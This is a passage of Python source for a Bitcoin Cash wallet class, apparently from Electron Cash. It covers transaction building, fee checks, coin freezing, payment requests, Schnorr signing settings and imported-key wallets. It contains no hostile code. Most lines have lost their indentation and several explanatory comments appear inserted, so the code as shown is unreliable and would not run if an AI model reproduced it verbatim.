self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
                    if addr is None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
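            # Worked example (hypothetical numbers): a tx whose hex `raw` is 500
            # chars long is 250 bytes; with a 200 sat fee that's 0.8 sats/B, so
            # is_lowfee ends up True. A 300 sat fee (1.2 sats/B) would not.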
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
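        # Descriptive note: an output whose amount is the string '!' means
        # "spend max"; its final amount is computed further below as the sum of
        # the inputs minus the other outputs and the fee. Only one such output
        # is permitted.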
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
# This new hook is for 'Cashshuffle Enabled' mode which will:
# Reserve a brand new change address if spending shuffled-only *or* unshuffled-only coins and
# disregard the "use_change" setting since to preserve privacy we must use a new change address each time.
# Pick and lock a new change address. This "locked" change address will not be used by the shuffle threads.
# Note that subsequent calls to this function will return the same change address until that address is involved
# in a tx and has a history, at which point a new address will get generated and "locked".
change_addrs = run_hook("get_change_addrs", self)
if not change_addrs: # hook gave us nothing, so find a change addr based on classic Electron Cash rules.
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [inputs[0]['address']]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
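        # Illustrative arithmetic (hypothetical numbers): a 250-byte tx paying a
        # 15,000 sat fee is 60 sats/byte and trips the check below; a 2,500 sat
        # fee on the same tx (10 sats/byte) passes.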
        if sats_per_byte > 50:
            raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
''' Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. '''
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo):
''' 'coin' level frozen query. `utxo' is a prevout:n string, or a dict
as returned from get_utxos(). Note: this is set/unset independent of
'address' level freezing. '''
assert isinstance(utxo, (str, dict))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
''' Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable. '''
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary = False):
'''Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
        call to `set_frozen_coin_state(utxos, False)`, both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`. '''
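        # Illustrative usage sketch (outpoint value is hypothetical):
        #   n = wallet.set_frozen_coin_state(['aa...ff:0'], True, temporary=True)
        # freezes that outpoint for this session only (not saved to storage);
        #   wallet.set_frozen_coin_state(['aa...ff:0'], False)
        # unfreezes it from both the temporary and the persistent sets.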
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add( utxo )
def discard(utxo):
self.frozen_coins.discard( utxo )
self.frozen_coins_tmp.discard( utxo )
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation( utxo )
ok += 1
elif isinstance(utxo, dict) and self.is_mine(utxo['address']):
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation( txo )
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
            self.cashacct.start(self.network)  # start cashacct network-dependent subsystem, network.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
            # Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
            # because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
            # Now no references to the synchronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None):
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
                break  # ok, it's old. no need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
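        # Descriptive note: this builds a child-pays-for-parent tx -- it finds
        # the first output of `tx` that pays one of our addresses and, if that
        # coin is still unspent, constructs a 1-in/1-out tx spending it back to
        # the same address minus `fee`, thereby bumping the effective fee rate
        # of the unconfirmed parent.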
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password):
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
amount_text = format_satoshis(r['amount'])
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
                if 'index_url' not in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
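        # Descriptive note: returns the bare constant PR_UNKNOWN when no request
        # exists for `key`, otherwise a (status, conf) tuple -- callers such as
        # receive_tx_callback above handle both shapes.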
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
            def f(x):
                addr = x.get('address')
                try:
                    return self.get_address_index(addr) or addr
                except:
                    # get_address_index failed; fall back to sorting by address
                    return addr
return sorted(m, key=f)
except TypeError:
            # See issue #1231 -- can get inhomogeneous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
        ''' Returns True if this wallet type is compatible with Schnorr signatures.
        `reason` is an optional list into which a translated string explaining
        why Schnorr isn't possible is placed (on a False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
            # time has passed that air-gapped systems are unlikely to lack
            # Schnorr support.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
        ''' Enable schnorr for this wallet. Note that if Schnorr is not possible
        (due to missing libs or an unsupported wallet type), is_schnorr_enabled() will
        still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
        transactions_to_remove = set()  # txs referred to only by this address
        transactions_new = set()        # txs also referred to by other addresses
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
